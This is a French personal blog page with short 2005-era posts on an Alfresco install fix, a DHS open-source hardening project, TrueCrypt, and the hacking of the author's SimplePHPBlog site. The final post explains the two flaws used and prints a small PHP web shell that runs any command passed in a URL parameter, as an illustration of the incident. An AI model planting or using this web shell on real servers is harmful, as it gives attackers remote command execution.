Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 41

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 48

Warning: strpos(): needle is not a string or an integer in /home/users/p/pbajoit/www/phil-sphpblog/index.php on line 55
Mon Blog, ça vient
 

Alfresco 1.3 installé aux forceps 

Installation catastrophique d'Alfresco, le système de Content Management Open Source qui a la cote : le programme d'installation échoue sur des opérations de démarrage de MySQL.

Le pire est que cette installation sous XP est déjà un palliatif à une installation sous Linux qui donne d'insolubles problèmes d'authentification MySQL.

La raison du problème : le fichier my.ini généré lors de l'installation contient des chemins Windows ( \ ) alors qu'il apprécie beaucoup plus les chemins de type Unix ( / ).

basedir=C:/bin/alfresco-1.3.0/mysql
datadir=C:/bin/alfresco-1.3.0/mysql/data

Et hop, ça tourne .. une fois les opérations de fin d'installation réalisées à la main (création des utilisateurs MySQL, installation des services).
( 1097 lectures )   |  permalien ( 3 / 1177 )
Augmenter la qualité des projets open-source 

Le Department of Homeland Security américain va sponsoriser un projet visant à améliorer la qualité de nombreux projets open-source : le Vulnerability Discovery and Remediation Open Source Hardening Project.
Le projet porte sur environ 40 packages dont Linux, Apache, MySQL et Sendmail.

C'est une sympathique manière de dépenser les dollars publics (le département étant plutôt connu pour mettre en place les directives fascisantes de l'équipe de GWB), tout autant que l'aveu de la très large utilisation de logiciels open-source pour des activités critiques dans les secteurs public et privé.

Mais GWB sait-il que l'open-source n'est pas une organisation charitative blanche, tout entière occupée à la promotion du créationnisme et de l'abstinence avant le mariage, tout en luttant contre l'avortement?
( 759 lectures )   |  permalien ( 2.9 / 1142 )
Statut de sécurité de SimplePHPBlog 

SimplePHPBlog - Statut des solutions
Secunia, le site consacré à la sécurité, tient à jour le statut de SimplePHPBlog, le logiciel utilisé pour ce blog.

Un bulletin moyen, puisque les solutions proviennent surtout des découvreurs de vulnérabilité plutôt que des développeurs.

Pour ma part, après cette petite intrusion, le logiciel est corrigé par des solutions maison.
( 726 lectures )   |  permalien ( 3 / 1027 )
Un bel outil 


TrueCrypt est un système qui crée et met à jour un volume encrypté à la volée (un fichier, ou un périphérique comme une disque USB). Cela signifie que les données sont automatiquement encryptées ou décryptées juste avant d'être écrites ou lues, sans intervention de l'utilisateur.

Aucune donnée ne peut être lue sans que le volume soit activé avec le mot de passe correct.

TrueCrypt utilise les algorithmes Twofish , Blowfish, CAST5, Serpent, AES et jusqu'à 3 de leurs combinaisons (par exemple Twofish-Serpent).
Les versions disponibles tournent sous Windows et Linux.

Pour les gens méfiants, il faut savoir qu'un volume TrueCrypt n'est pas reconnaissable (par exemple un volume sur disque USB ressemble à un disque non formatté) et que de plus, il est possible de placer un volume caché à l'intérieur d'un volume anodin (pour ceux qui donneraient leur mot de passe sous la menace) ...

TrueCrypt est un projet open-source hébergé par SourceForge.
( 670 lectures )   |  permalien ( 3.1 / 1222 )
Ca c'est de la belle marchandise monsieur! 

Une suggestion d'un vendeur de logiciels à qui une démonstration est demandée:
Let's not built a demo/technical proof.
This is time-consuming and does most of the times not require buy-in from the customer.
Let's convince them on logical differentiators.
I suggest that you contact the responsible pre-sales engineer <snip> in order to provide you with logical, convincing ammunition.
Certain qu'avec des munitions pareilles, le secteur va sortir de l'artisanat ...
( 576 lectures )   |  permalien ( 3 / 1017 )
Une grosse faille de sécurité de SimplePHPBlog 

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:
weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:
<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.
Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!
( 1004 lectures )   |  permalien ( 3.2 / 935 )

<< <Précédent | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | Suivant> >>